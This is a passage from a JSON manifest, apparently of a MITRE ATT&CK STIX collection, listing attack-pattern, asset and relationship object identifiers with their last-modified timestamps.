"object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b", "object_modified": "2024-02-15T14:19:22.282Z"}, {"object_ref": "attack-pattern--e0033c16-a07e-48aa-8204-7c3ca669998c", "object_modified": "2023-08-14T15:37:02.771Z"}, {"object_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", "object_modified": "2024-01-31T20:46:43.215Z"}, {"object_ref": "attack-pattern--e0232cb0-ded5-4c2e-9dc7-2893142a5c11", "object_modified": "2023-10-16T16:35:12.501Z"}, {"object_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", "object_modified": "2023-10-13T17:57:11.924Z"}, {"object_ref": "attack-pattern--e0d74479-86d2-465d-bf36-903ebecef43e", "object_modified": "2022-05-24T14:00:00.188Z"}, {"object_ref": "attack-pattern--e196b5c5-8118-4a1c-ab8a-936586ce3db5", "object_modified": "2024-01-31T20:05:44.075Z"}, {"object_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", "object_modified": "2023-10-13T17:57:12.125Z"}, {"object_ref": "attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db", "object_modified": "2023-10-31T14:00:00.188Z"}, {"object_ref": "attack-pattern--e2907cea-4b43-4ed7-a570-0fdf0fbeea00", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--e2994b6a-122b-4043-b654-7411c5198ec0", "object_modified": "2023-05-08T20:13:24.241Z"}, {"object_ref": "attack-pattern--e33c7ecc-5a38-497f-beb2-a9a2049a4c20", "object_modified": "2023-10-13T17:57:12.329Z"}, {"object_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", "object_modified": "2023-08-14T19:08:59.741Z"}, {"object_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88", "object_modified": "2023-08-11T21:10:09.547Z"}, {"object_ref": "attack-pattern--e3b168bd-fcd7-439e-9382-2e6c2f63514d", "object_modified": "2022-10-21T14:32:05.257Z"}, {"object_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58", "object_modified": "2024-04-16T00:16:06.689Z"}, {"object_ref": "attack-pattern--e49920b0-6c54-40c1-9571-73723653205f", "object_modified": "2024-04-19T04:25:33.300Z"}, {"object_ref": "attack-pattern--e49ee9d2-0d98-44ef-85e5-5d3100065744", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--e4dc8c01-417f-458d-9ee0-bb0617c1b391", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--e51137a5-1cdc-499e-911a-abaedaa5ac86", "object_modified": "2023-03-30T21:01:52.873Z"}, {"object_ref": "attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--e5d550f3-2202-4634-85f2-4a200a1d49b3", "object_modified": "2023-03-13T20:35:52.302Z"}, {"object_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", "object_modified": "2023-10-13T17:57:12.528Z"}, {"object_ref": "attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e", "object_modified": "2023-07-28T18:24:16.246Z"}, {"object_ref": "attack-pattern--e6415f09-df0e-48de-9aba-928c902b7549", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", "object_modified": "2024-04-11T15:08:01.731Z"}, {"object_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", "object_modified": "2023-10-13T17:57:12.723Z"}, {"object_ref": "attack-pattern--e6f19759-dde3-47fc-99cc-d9f5fa4ade60", "object_modified": "2024-04-18T23:51:40.464Z"}, {"object_ref": "attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722", "object_modified": "2023-10-13T17:57:12.926Z"}, {"object_ref": "attack-pattern--e74de37c-a829-446c-937d-56a44f0e9306", "object_modified": "2024-01-03T15:46:06.706Z"}, {"object_ref": "attack-pattern--e7cbc1de-1f79-48ee-abfd-da1241c65a15", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--e7eab98d-ae11-4491-bd28-a53ba875865a", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--e848506b-8484-4410-8017-3d235a52f5b3", "object_modified": "2024-03-05T16:13:38.643Z"}, {"object_ref": "attack-pattern--e8a0a025-3601-4755-abfb-8d08283329fb", "object_modified": "2024-04-17T00:02:12.021Z"}, {"object_ref": "attack-pattern--e906ae4d-1d3a-4675-be23-22f7311c0da4", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--e99ec083-abdd-48de-ad87-4dbf6f8ba2a4", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--ea016b56-ae0e-47fe-967a-cc0ad51af67f", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--ea071aa0-8f17-416f-ab0d-2bab7e79003d", "object_modified": "2023-09-30T21:28:45.038Z"}, {"object_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", "object_modified": "2024-03-29T14:04:50.569Z"}, {"object_ref": "attack-pattern--ea4c2f9c-9df1-477c-8c42-6da1118f2ac4", "object_modified": "2022-11-08T14:00:00.188Z"}, {"object_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", "object_modified": "2023-10-13T17:57:13.327Z"}, {"object_ref": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf", "object_modified": "2023-08-07T14:23:30.265Z"}, {"object_ref": "attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--eb897572-8979-4242-a089-56f294f4c91d", "object_modified": "2024-04-18T19:44:00.603Z"}, {"object_ref": "attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d", "object_modified": "2024-04-19T04:27:31.884Z"}, {"object_ref": "attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3", "object_modified": "2022-05-24T14:00:00.188Z"}, {"object_ref": "attack-pattern--ec4be82f-940c-4dcb-87fe-2bbdd17c692f", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--ed730f20-0e44-48b9-85f8-0e2adeb76867", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a", "object_modified": "2024-04-16T12:41:55.175Z"}, {"object_ref": "attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--edf91964-b26e-4b4a-9600-ccacd7d7df24", "object_modified": "2023-07-28T14:41:38.908Z"}, {"object_ref": "attack-pattern--ee7ff928-801c-4f34-8a99-3df965e581a5", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--eec23884-3fa1-4d8a-ac50-6f104d51e235", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", "object_modified": "2023-10-13T17:57:13.531Z"}, {"object_ref": "attack-pattern--f005e783-57d4-4837-88ad-dbe7faee1c51", "object_modified": "2024-04-28T15:43:18.080Z"}, {"object_ref": "attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4", "object_modified": "2023-08-14T15:53:00.999Z"}, {"object_ref": "attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65", "object_modified": "2024-03-29T15:42:13.499Z"}, {"object_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995", "object_modified": "2022-05-24T14:00:00.188Z"}, {"object_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5", "object_modified": "2024-02-14T21:56:34.831Z"}, {"object_ref": "attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee", "object_modified": "2023-03-30T21:01:46.538Z"}, {"object_ref": "attack-pattern--f2d44246-91f1-478a-b6c8-1227e0ca109d", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077", "object_modified": "2024-04-16T12:50:15.929Z"}, {"object_ref": "attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "object_modified": "2023-11-15T14:38:10.876Z"}, {"object_ref": "attack-pattern--f44731de-ea9f-406d-9b83-30ecbb9b4392", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945", "object_modified": "2023-08-11T21:34:38.558Z"}, {"object_ref": "attack-pattern--f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--f4b843c1-7e92-4701-8fed-ce82f8be2636", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", "object_modified": "2024-04-11T21:51:44.851Z"}, {"object_ref": "attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89", "object_modified": "2022-08-31T17:30:05.440Z"}, {"object_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "object_modified": "2024-04-12T02:30:08.379Z"}, {"object_ref": "attack-pattern--f63fe421-b1d1-45c0-b8a7-02cd16ff2bed", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317", "object_modified": "2024-01-31T14:15:55.690Z"}, {"object_ref": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", "object_modified": "2024-03-07T14:29:02.408Z"}, {"object_ref": "attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--f792d02f-813d-402b-86a5-ab98cb391d3b", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--f7c0689c-4dbd-489b-81be-7cb7c7079ade", "object_modified": "2024-02-02T20:10:01.862Z"}, {"object_ref": "attack-pattern--f870408c-b1cd-49c7-a5c7-0ef0fc496cc6", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e", "object_modified": "2022-07-22T18:51:42.238Z"}, {"object_ref": "attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307", "object_modified": "2023-10-13T17:57:13.719Z"}, {"object_ref": "attack-pattern--f8ef3a62-3f44-40a4-abca-761ab235c436", "object_modified": "2023-10-31T14:00:00.188Z"}, {"object_ref": "attack-pattern--f9cc4d06-775f-4ee1-b401-4e2cc0da30ba", "object_modified": "2023-10-31T14:00:00.188Z"}, {"object_ref": "attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", "object_modified": "2024-04-09T20:51:03.049Z"}, {"object_ref": "attack-pattern--fa44a152-ac48-441e-a524-dd7b04b8adcd", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", "object_modified": "2023-10-13T17:57:14.123Z"}, {"object_ref": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac", "object_modified": "2024-04-16T13:00:33.303Z"}, {"object_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", "object_modified": "2023-10-20T17:01:10.138Z"}, {"object_ref": "attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490", "object_modified": "2023-10-31T14:00:00.188Z"}, {"object_ref": "attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", "object_modified": "2023-07-14T13:04:04.591Z"}, {"object_ref": "attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b", "object_modified": "2023-10-15T11:41:47.274Z"}, {"object_ref": "attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b", "object_modified": "2022-05-24T14:00:00.188Z"}, {"object_ref": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--ffbcfdb0-de22-4106-9ed3-fc23c8a01407", "object_modified": "2022-10-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--ffe59ad3-ad9b-4b9f-b74f-5beb3c309dc1", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--ffe742ed-9100-4686-9e00-c331da544787", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "object_modified": "2023-10-04T17:46:20.340Z"}, {"object_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", "object_modified": "2024-05-30T15:27:47.148Z"}, {"object_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", "object_modified": "2024-05-30T15:24:40.201Z"}, {"object_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", "object_modified": "2024-05-30T15:25:05.583Z"}, {"object_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", "object_modified": "2024-05-30T15:26:58.383Z"}, {"object_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "object_modified": "2023-10-04T18:09:59.538Z"}, {"object_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "object_modified": "2023-10-04T18:08:33.386Z"}, {"object_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "object_modified": "2023-10-04T17:57:56.558Z"}, {"object_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "object_modified": "2024-05-21T16:23:41.133Z"}, {"object_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "object_modified": "2024-05-30T15:19:02.847Z"}, {"object_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", "object_modified": "2023-10-04T19:26:49.788Z"}, {"object_ref": "x-mitre-asset--a2747432-b914-4bfb-b905-ef44f446a3ff", "object_modified": "2024-05-30T15:28:49.087Z"}, {"object_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "object_modified": "2023-10-04T17:59:11.489Z"}, {"object_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", "object_modified": "2024-05-30T15:21:30.103Z"}, {"object_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "object_modified": "2023-10-04T18:01:02.506Z"}, {"object_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "object_modified": "2023-10-04T18:03:06.811Z"}, {"object_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "object_modified": "2023-10-04T18:09:21.296Z"}, {"object_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "object_modified": "2023-10-04T18:05:43.237Z"}, {"object_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "object_modified": "2024-05-30T15:29:20.916Z"}, {"object_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "object_modified": "2023-10-16T18:49:08.504Z"}, {"object_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "object_modified": "2023-10-04T18:07:59.333Z"}, {"object_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "object_modified": "2023-09-28T14:23:52.358Z"}, {"object_ref": "relationship--007a2c53-fc5c-4750-aff0-defb282e178a", "object_modified": "2023-09-29T16:30:30.829Z"}, {"object_ref": "relationship--00814703-3c3b-4872-89e9-cea4ba5edf2d", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--011f1d16-c9f1-48ac-94f1-165466c155f8", "object_modified": "2023-09-29T18:43:33.176Z"}, {"object_ref": "relationship--012fd76f-1a10-4e48-9306-10ffae3f61dd", "object_modified": "2023-09-29T16:30:58.431Z"}, {"object_ref": "relationship--01335508-22bb-4185-a7e2-49ec9bee6423", "object_modified": "2023-09-28T20:15:20.293Z"}, {"object_ref": "relationship--01d002a2-696a-4e22-b227-b0b32f54eaf0", "object_modified": "2023-09-29T18:42:27.894Z"}, {"object_ref": "relationship--02117d44-46d2-41f0-a5fb-ba303e6ee124", "object_modified": "2024-05-23T19:40:55.153Z"}, {"object_ref": "relationship--026ba3e5-ae3b-4a8b-83c0-ea8327cd9e50", "object_modified": "2023-09-29T17:42:44.516Z"}, {"object_ref": "relationship--02c0faf7-6969-420f-b9d8-b8eacfefb61e", "object_modified": "2024-05-23T19:43:58.513Z"}, {"object_ref": "relationship--02f547fd-2565-4130-a4be-c4ba7b5aeb0c", "object_modified": "2023-09-29T17:59:31.091Z"}, {"object_ref": "relationship--02fee6ab-f7a1-4168-919f-63c4f0b3349c", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--033b4401-261f-498b-89f3-2bad9ff5907a", "object_modified": "2023-09-29T17:58:15.338Z"}, {"object_ref": "relationship--0384ef48-ede0-4200-be47-413622f4c690", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--03a3226b-0b28-49a9-860f-a8c13ffbe00d", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--03aab956-54f3-4e4b-93a7-6d1898d91b57", "object_modified": "2023-09-29T16:29:03.438Z"}, {"object_ref": "relationship--03e94c12-cd51-4f39-a33d-c66a31bbf361", "object_modified": "2023-09-29T17:40:34.866Z"}, {"object_ref": "relationship--042f383d-ce12-4f7f-85ed-ad1410302a07", "object_modified": "2024-05-23T19:54:08.739Z"}, {"object_ref": "relationship--049ce77e-19b0-4641-8e49-8504ab47921e", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--04aad4a8-8b8c-45d9-bb34-508fe4792863", "object_modified": "2023-09-28T20:29:11.776Z"}, {"object_ref": "relationship--050b13e6-22e2-450c-a075-44a79fb79dc9", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--0536e9fb-2b02-43e4-b3e4-1191ed4b526d", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--05d0c3fe-f210-4dd1-a082-45ac8f0c1c47", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--05e3980c-03ae-4624-82d8-0cbcc45705cd", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--064f8984-e6cc-4334-a5ad-903a7af9bf4c", "object_modified": "2023-03-08T22:40:07.137Z"}, {"object_ref": "relationship--0750563d-a86c-4822-ab9c-0f2d3c304c6e", "object_modified": "2023-09-28T21:28:51.104Z"}, {"object_ref": "relationship--07683c47-4572-4579-93e7-ac83f2933ac2", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--076bfea6-309e-4804-a147-dffe93983481", "object_modified": "2023-09-28T20:16:17.295Z"}, {"object_ref": "relationship--079bbf9d-0282-41af-8eb6-a6d914303895", "object_modified": "2024-05-22T15:10:18.321Z"}, {"object_ref": "relationship--07abc331-1277-4866-8794-a842586d3f5e", "object_modified": "2024-05-23T19:56:25.826Z"}, {"object_ref": "relationship--07ae5595-8337-4422-b883-9a4085c6a08e", "object_modified": "2024-05-23T20:37:56.927Z"}, {"object_ref": "relationship--07e06d21-e666-4274-838a-ef9996fdc0cd", "object_modified": "2023-09-28T20:05:45.540Z"}, {"object_ref": "relationship--07f11dc3-60d7-42d3-a4f0-82eba85dfe44", "object_modified": "2023-09-29T16:47:20.192Z"}, {"object_ref": "relationship--08fc37d1-2314-4661-abdb-1bf0472b2bf1", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--09254382-c7cd-4340-97c2-d8ecda757e59", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--0951222a-42d1-4635-bb12-5285bc6500e0", "object_modified": "2023-09-28T20:15:45.244Z"}, {"object_ref": "relationship--095456bc-898b-4c76-a062-ff0ea90aeab4", "object_modified": "2023-09-28T21:25:05.393Z"}, {"object_ref": "relationship--096c3136-dac9-4729-98c0-c8d870f2bd13", "object_modified": "2023-09-28T19:42:01.055Z"}, {"object_ref": "relationship--09bb741d-4f8b-4ae5-95f7-38d85e4d825a", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--09c76211-6357-4dc3-b4f6-361007e21af9", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--09e0c991-1707-431b-a0fd-fd8215e6d552", "object_modified": "2023-09-28T20:30:12.291Z"}, {"object_ref": "relationship--09e9ed5d-bf32-4aee-8441-774e21ffbdb6", "object_modified": "2023-09-28T19:53:56.266Z"}, {"object_ref": "relationship--0a421699-f013-49f4-9d9f-01d95d210510", "object_modified": "2023-09-28T19:37:25.214Z"}, {"object_ref": "relationship--0a5002d3-cf0d-4e26-9fc4-8faff7f6578a", "object_modified": "2023-09-29T17:38:04.048Z"}, {"object_ref": "relationship--0a7810c5-850a-41e9-9d44-cbbdeebd8044", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--0a8f5e7d-04d8-4ca8-a1d1-ea6a0ccc6140", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--0ad2b49a-d35f-464c-a3c6-f9342977fefc", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--0b24b8de-944d-49ea-a15f-cb732aeb31de", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--0b2a6fc5-3416-4d78-96cb-f6325c91ab91", "object_modified": "2023-10-02T20:23:11.865Z"}, {"object_ref": "relationship--0b2d0517-9943-413e-a6f9-30c6d5ce8c42", "object_modified": "2023-09-28T19:59:10.561Z"}, {"object_ref": "relationship--0b66c798-f1fc-4e2f-b3b4-433dde89a191", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--0b6cd19f-ee13-4224-9e22-f8a9e626d98f", "object_modified": "2023-09-28T21:22:48.239Z"}, {"object_ref": "relationship--0b92b0f0-fdc0-4f20-98f3-ca2c1932de24", "object_modified": "2024-05-23T21:20:20.489Z"}, {"object_ref": "relationship--0ba1db3a-389a-4937-975b-d2dc0142cb4b", "object_modified": "2023-09-29T18:46:22.739Z"}, {"object_ref": "relationship--0bc90405-24a9-4f84-a1bb-bf953dbca016", "object_modified": "2023-09-28T20:10:34.479Z"}, {"object_ref": "relationship--0be618a0-f752-450f-8838-60c17fabd278", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--0c29bffb-78c0-43c0-8b99-f5155bfa0432", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--0c72593d-fcc6-4023-8771-bed5e243310e", "object_modified": "2023-09-28T21:24:37.417Z"}, {"object_ref": "relationship--0cab29c6-d196-47b0-8621-10ac3c8a95d8", "object_modified": "2023-09-28T19:51:27.775Z"}, {"object_ref": "relationship--0d06a9f1-fc35-4f35-a628-3515b0686747", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--0d2d9b59-a152-4280-ac57-ce5416cbbe61", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--0d52eea3-394e-492b-944b-9ccb6348329d", "object_modified": "2023-09-28T21:14:41.633Z"}, {"object_ref": "relationship--0d8e0324-ba8e-4712-a123-60377afe94da", "object_modified": "2023-09-29T18:48:17.073Z"}, {"object_ref": "relationship--0dbf48f3-4579-4ca2-aceb-19d3e0449136", "object_modified": "2023-09-29T17:57:12.010Z"}, {"object_ref": "relationship--0e191d66-fe38-4f28-ad82-6922bd6bcc81", "object_modified": "2024-04-09T20:58:17.933Z"}, {"object_ref": "relationship--0e263b73-a033-4fac-9d6d-076ab8f8b954", "object_modified": "2023-09-29T16:27:50.949Z"}, {"object_ref": "relationship--0e4407b6-fa67-48a7-97c5-f0bff5112912", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--0ea6c4e4-fedd-4fd9-a5fc-c07e3fb0f2a5", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--0ec0af54-0182-4ad4-9b0e-4542a822de7f", "object_modified": "2022-09-30T18:50:14.500Z"}, {"object_ref": "relationship--0ef1e408-8ebb-4b28-b619-02914b7bae29", "object_modified": "2023-09-29T17:57:34.378Z"}, {"object_ref": "relationship--0f057592-54cb-4e99-9369-55ea6ba0e5e6", "object_modified": "2024-05-22T15:10:30.054Z"}, {"object_ref": "relationship--0f2d1c8b-4fb7-41e7-8def-36123060e5ae", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--0f5295ce-d705-4541-8dda-c569b126d103", "object_modified": "2023-10-02T20:24:03.723Z"}, {"object_ref": "relationship--0f5710a7-f015-40b8-ad3d-f281699f2b72", "object_modified": "2023-09-29T17:09:11.210Z"}, {"object_ref": "relationship--0fee6145-185d-417f-a431-201a5b3e3259", "object_modified": "2024-03-29T12:38:17.884Z"}, {"object_ref": "relationship--106530e1-375a-4ac4-befb-8297b3b05610", "object_modified": "2024-05-23T21:21:51.135Z"}, {"object_ref": "relationship--10ee09db-e80d-4022-8810-7bba70b33609", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--10fdc4f4-9f50-40d8-94db-966fcc434a14", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--1125875e-691d-40a8-91f8-14c6f6bd43b9", "object_modified": "2024-05-23T21:50:22.964Z"}, {"object_ref": "relationship--116191ae-f163-4d6e-9a79-d07a68d1388b", "object_modified": "2024-05-22T15:13:23.730Z"}, {"object_ref": "relationship--11840b30-f0d1-4df5-a960-cdb80749c32a", "object_modified": "2023-09-29T17:07:25.209Z"}, {"object_ref": "relationship--11a82651-4d69-4738-89c6-17d0243cbbb0", "object_modified": "2023-09-29T17:37:26.536Z"}, {"object_ref": "relationship--11f8631f-9475-4910-baa6-975eb776798a", "object_modified": "2022-05-24T14:00:00.188Z"}, {"object_ref": "relationship--12043603-b490-41fc-84ed-99e70ca4876c", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--121c5fd3-dc71-4f45-b6dc-4b20a0bde300", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--126f9334-8b0c-4948-a495-07e2b5a7744a", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--128de3f9-df58-4122-9523-0ac65a6ebf71", "object_modified": "2023-09-29T17:45:20.237Z"}, {"object_ref": "relationship--12d6fc4f-bf06-4146-a387-4cb86f0f44a4", "object_modified": "2023-09-28T21:13:23.057Z"}, {"object_ref": "relationship--12fdacea-28f7-4113-ae67-0b19e1ab5e36", "object_modified": "2023-09-28T19:39:58.335Z"}, {"object_ref": "relationship--1313b6ce-f09b-4747-abd9-0220293d60f3", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--13fade18-6f60-40c6-bf34-0ef97424a4ce", "object_modified": "2024-05-22T15:21:45.850Z"}, {"object_ref": "relationship--1429cd78-4e2a-4898-a7d8-d01a0c465bd6", "object_modified": "2023-10-02T20:24:12.666Z"}, {"object_ref": 